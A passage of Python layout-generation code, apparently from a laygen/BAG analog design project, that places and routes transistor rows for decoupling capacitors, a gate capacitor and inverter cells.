devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') # 
route #pdict = [laygen.get_inst_pin_xy(None, None, rg_m1m2, index=np.array([i, 0])) for i in range(m)] xy_g0 = laygen.get_template_pin_xy(in1.cellname, 'G0', rg_m1m2)[0, :] xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :] xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] #gate route laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_g0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, xy_g0, refinstname=ip1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) #source route for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=ip1.name, refinstindex1=np.array([i, 0])) #drain route if m > 1: laygen.route(None, 
laygen.layers['metal'][2], xy0=xy_d0+np.array([0, 1]), xy1=xy_d0+np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_d0+np.array([0, 1]), refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0+np.array([0, 1]), xy1=xy_d0+np.array([0, 1]), gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_d0+np.array([0, 1]), refinstname=ip1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) # vss/vdd vertical route laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m2m3, refinstname0=ip1.name, refinstname1=in1.name, refinstindex0=np.array([0, 0]), refinstindex1=np.array([0, 0]), via0=[[0, 0]], via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m2m3, refinstname0=in1.name, refinstname1=ip1.name, refinstindex0=np.array([m-1, 0]), refinstindex1=np.array([m-1, 0]), via0=[[0, 0]], via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0])+np.array([0, 2]), xy1=xy_g0*np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refinstname1=in1.name, refinstindex0=np.array([m-1, 0]), refinstindex1=np.array([m-1, 0]), via0=[[0, 0]], via1=[[0, 0]]) laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0])+np.array([0, 2]), xy1=xy_g0*np.array([1, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refinstname1=ip1.name, refinstindex0=np.array([0, 0]), refinstindex1=np.array([0, 0]), via0=[[0, 0]], via1=[[0, 0]]) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, 
gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_dcap3(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_space, m=2, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip1b = laygen.relplace(name = "I"+objectname_pfix+'P1B', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') # route #pdict = [laygen.get_inst_pin_xy(None, None, rg_m1m2, index=np.array([i, 0])) for i in range(m)] xy_g0 = 
laygen.get_template_pin_xy(in1.cellname, 'G0', rg_m1m2)[0, :] xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :] xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] #vss ''' for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) ''' ''' laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([0, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([m-1, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) ''' laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0, xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m-1): laygen.via(None, xy_d0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, xy_s1, refinstname=in1.name, refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=xy_s0+np.array([0, 1]), xy1=xy_d0+np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) laygen.via(None, xy_d0+np.array([0, 1]), refinstname=in1.name, refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) 
# --- tail of the generator begun on the preceding lines (body continues at function indent) ---
    laygen.via(None, xy_s0+np.array([0, 1]), refinstname=in1.name, refinstindex=np.array([0, 0]), gridname=rg_m1m2)
    # gate: strap all G0 fingers of the nmos row on M2, drop an M1-M2 via on each
    laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0]))
    for i in range(m):
        laygen.via(None, xy_g0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    # vertical M1 jog up 2 tracks, then M2 over 3 tracks, then M1 back down to the pmos row
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_g0, xy1=xy_g0+np.array([0, 2]), gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name, via1=[[0, 0]])
    laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0+np.array([0, 2]), xy1=xy_g0+np.array([3, 2]), gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name, via1=[[0, 0]])
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_g0*np.array([1, 0])+np.array([3, 0]), xy1=xy_g0+np.array([3, 2]), gridname0=rg_m1m2, refinstname0=ip1.name, via0=[[0, 0]], refinstname1=in1.name)
    # power and ground rail: M2 rails spanning the boundary cells
    xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0])
    rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name)
    rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name)
    # pin
    if create_pin == True:
        create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss)

def generate_bcap2(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3,
                   devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body,
                   m=2, origin=np.array([0,0]), create_pin=False):
    """Generate a bcap2 (gate-capacitor) layout.

    Places an nmos row and a mirrored pmos row (boundary-body-boundary),
    straps both rows' gates on M2, ties sources to the rails on M1, straps
    drains on M2 (when m > 1), and routes the gate input up on M3 as pin 'I'.
    M2 VDD/VSS rails span the cell; pins are created when create_pin is True.

    m is halved (nf=2 devices), floored at 1.
    NOTE(review): rg_m2m3 and rg_m2m3_pin are referenced below but never
    bound from routing_grid_m2m3 in this body — they resolve only if defined
    at an enclosing scope; confirm against the module.
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    m = max(1, int(m / 2)) # using nf=2 devices
    # placement
    in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin)
    in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1]))
    in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name)
    ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX')
    ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1]))
    ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX')
    # route
    #pdict = [laygen.get_inst_pin_xy(None, None, rg_m1m2, index=np.array([i, 0])) for i in range(m)]
    # template pin coordinates of the body cell, on the m1-m2 grid
    xy_g0 = laygen.get_template_pin_xy(in1.cellname, 'G0', rg_m1m2)[0, :]
    xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :]
    xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :]
    xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :]
    # gate route: M2 straps across all fingers of both rows, with vias per finger
    laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0]))
    laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0]))
    for i in range(m):
        laygen.via(None, xy_g0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, xy_g0, refinstname=ip1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    # source route: drop every S0/S1 of both rows onto the rails with vertical M1 stubs
    for i in range(m):
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0]))
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0]))
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=ip1.name, refinstindex1=np.array([i, 0]))
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=ip1.name, refinstindex1=np.array([i, 0]))
    # drain route: one track above D0, M2 strap per row (only meaningful for multi-finger)
    if m > 1:
        laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0+np.array([0, 1]), xy1=xy_d0+np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0]))
        for i in range(m):
            laygen.via(None, xy_d0+np.array([0, 1]), refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0+np.array([0, 1]), xy1=xy_d0+np.array([0, 1]), gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0]))
        for i in range(m):
            laygen.via(None, xy_d0+np.array([0, 1]), refinstname=ip1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    # input route: vertical M3 connecting the nmos and pmos gate straps
    rg0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2, 0]), xy1=np.array([2, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0', via0=[[0, 0]], via1=[[0, 0]])
    # vss/vdd vertical route
    #laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m2m3,
    #             refinstname0=ip1.name, refinstname1=in1.name,
    #             refinstindex0=np.array([0, 0]), refinstindex1=np.array([0, 0]), via0=[[0, 0]], via1=[[0, 0]])
    #laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m2m3,
    #             refinstname0=in1.name, refinstname1=ip1.name,
    #             refinstindex0=np.array([m-1, 0]), refinstindex1=np.array([m-1, 0]), via0=[[0, 0]], via1=[[0, 0]])
    laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0])+np.array([0, 2]), xy1=xy_g0*np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refinstname1=in1.name, refinstindex0=np.array([m-1, 0]), refinstindex1=np.array([m-1, 0]), via0=[[0, 0]], via1=[[0, 0]])
    laygen.route(None, laygen.layers['metal'][3], xy0=xy_g0*np.array([1, 0])+np.array([0, 2]), xy1=xy_g0*np.array([1, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refinstname1=ip1.name, refinstindex0=np.array([0, 0]), refinstindex1=np.array([0, 0]), via0=[[0, 0]], via1=[[0, 0]])
    # power and ground rail
    xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0])
    rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name)
    rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name)
    # pin
    if create_pin == True:
        create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I'], rect_list=[rg0])
        create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss)

def generate_inv(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3,
                 routing_grid_m1m2_pin, routing_grid_m2m3_pin,
                 devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body,
                 m=1, pin_i_abut='nmos', origin=np.array([0,0]), create_pin=False):
    """Generate an inverter layout.

    Places an nmos row and a mirrored pmos row, connects the gates (input I,
    vertical M3 stub placed on the row chosen by pin_i_abut), shorts the
    drains (output O, vertical M3 at the last finger), ties sources to the
    M2 VDD/VSS rails, and optionally creates I/O and power pins.

    m is halved (nf=2 devices), floored at 1. The m==1 case uses extended
    end-style routes and a shifted pin track.
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m1m2_pin = routing_grid_m1m2_pin
    rg_m2m3_pin = routing_grid_m2m3_pin
    m = max(1, int(m / 2)) # using nf=2 devices
    # placement
    in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin)
    in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1]))
    in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name)
    ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX')
    ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1]))
    ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX')
    # route
    # horizontal route style
    # input: choose which row carries the input via/stub
    if pin_i_abut=="nmos": refinstname_in=in1.name
    else: refinstname_in=ip1.name
    for i in range(m):
        # vertical M1 gate tie between nmos and pmos, per finger
        laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2,
                     refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]),
                     refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), )
        laygen.via(None, np.array([0, 0]), refinstname=refinstname_in, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    if m==1:
        # single finger: extend the M2 gate strap and put the M3 input stub one track left
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=refinstname_in, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=refinstname_in, refpinname1='G0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend")
        ri0 = laygen.route("R"+objectname_pfix+"I0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0')
        laygen.via(None, np.array([-1, 0]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m2m3)
    else:
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=refinstname_in, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=refinstname_in, refpinname1='G0', refinstindex1=np.array([m-1, 0]))
        ri0 = laygen.route("R"+objectname_pfix+"I0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0')
        laygen.via(None, np.array([0, 0]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m2m3)
    # output: M2 drain straps on both rows
    if m==1:
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend")
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend")
    else:
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]))
        laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]))
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    # M2-M3 vias at the last finger, then vertical M3 output connecting the two rows
    laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3)
    laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3)
    ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]))
    # power and ground rail
    xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0])
    rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name)
    rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name)
    # power and ground route: drop S0 of every finger (and S1 of the last) onto the rails
    xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :]
    for i in range(m):
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0]))
        laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0]))
        laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0]))
        laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0]))
    xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :]
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([m-1, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0]))
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0]))
    laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0]))
    laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0]))
    # pin
    if create_pin == True:
        create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I', 'O'], rect_list=[ri0, ro0])
        create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss)

def generate_inv_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3,
                    routing_grid_m1m2_pin, routing_grid_m2m3_pin,
                    devname_nmos_boundary, devname_nmos_body, devname_nmos_space,
                    devname_pmos_boundary, devname_pmos_body, devname_pmos_space,
                    pin_i_abut='nmos', pin_o_y=0, origin=np.array([0, 0]), create_pin=False):
    """Generate a 1x (single-finger) inverter layout.

    Same structure as generate_inv but fixed to one body cell per row plus a
    trailing space cell; pin_o_y selects the output track, pin_i_abut selects
    which row carries the input stub. (Body continues past this chunk's first
    part — output vias, rails, and pins follow.)
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m1m2_pin = routing_grid_m1m2_pin
    rg_m2m3_pin = routing_grid_m2m3_pin
    # placement
    in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin)
    in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name)
    in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name)
    in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_space, gridname = pg, refinstname = in2.name)
    ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX')
    ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX')
    ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX')
    ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_space, gridname = pg, refinstname = ip2.name, transform='MX')
    # route
    # input
    if pin_i_abut == "nmos": refinstname_in = in1.name
    else: refinstname_in = ip1.name
